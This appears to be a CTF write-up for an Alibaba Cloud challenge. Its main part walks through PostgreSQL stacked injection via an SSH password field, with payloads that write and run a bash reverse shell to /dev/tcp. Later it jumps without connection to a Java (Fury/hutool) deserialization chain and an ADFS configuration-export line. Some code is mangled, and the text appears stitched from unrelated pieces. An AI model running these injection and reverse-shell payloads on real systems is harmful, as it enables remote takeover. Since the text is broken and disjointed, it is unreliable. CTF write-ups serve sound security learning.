During the annual Alibaba Cloud CTF, I wanted to complain about the FakeJumpServer problem. I gave it a hint but couldn’t solve it. Finally, I realized it was a simple PostgreSQL stack injection, but the injection point was SSH. 😅
Nu1L hasn’t shut down the environment yet, so I can try it now.
FakeJumpServer
Connect directly via SSH and check the version. You’ll see it’s a FakeJumpServer. The organizers are saying this question is a hacked SSH exploit that requires real-world thinking. It turns out to be a penetration test, so that’s fine.
The typical pgSQL execution command is as follows; I won’t explain it here; it’s very simple.
1 2 3 4
DROPTABLE IF EXISTSexec; CREATE TABLEexec(op text); COPYexecFROM PROGRAM 'id'; SELECT*FROMexec;
So we first determine whether there is a delayed injection, the injection point is password
1
-1';select pg_sleep(5);--
The five-second delay here indicates an injection.
Then the shell is written and rebound normally.
1 2 3 4 5 6 7 8 9 10 11 12
-1';select pg_sleep(5);-- -1';CREATE TABLE exec(op text);-- -1';COPY exec FROM PROGRAM 'echo -n "/bin/ba" > /tmp/1.sh';-- -1';COPY exec FROM PROGRAM 'echo -n "sh -i >&" >> /tmp/1.sh';-- -1';COPY exec FROM PROGRAM 'echo -n " /dev/tcp" >> /tmp/1.sh';-- -1';COPY exec FROM PROGRAM 'echo -n "/111" >> /tmp/1.sh';-- -1';COPY exec FROM PROGRAM 'echo -n ".11.1" >> /tmp/1.sh';-- -1';COPY exec FROM PROGRAM 'echo -n "11.111" >> /tmp/1.sh';-- -1';COPY exec FROM PROGRAM 'echo -n "/111" >> /tmp/1.sh';-- -1';COPY exec FROM PROGRAM 'echo -n "11 0>&1" >> /tmp/1.sh';-- -1';COPY exec FROM PROGRAM 'chmod +x /tmp/1.sh';-- -1';COPY exec FROM PROGRAM 'bash /tmp/1.sh';--
This problem was also reproduced after the competition. There were only three solutions. Let’s take a look.
Looking at the source code, I found that it is the Fury framework, which is relatively new and has very few related vulnerabilities. Here we can clearly see that the data field has been deserialized, so we can find where this deserialization can be triggered.
A quick search revealed deserialization in cn.hutool.core.convert.impl.BeanConverter#convertInternal.
A closer look revealed the use of MapProxy to create a Bean type proxy, but without verifying that the Map’s contents fully meet the target type requirements. Furthermore, the MapProxy#invoke method triggers a convert call.
This shows an ADFS single sign-on, and then in the network monitoring system. On the ADFS01 machine, you can export the AdfsConfigurationV4 configuration database.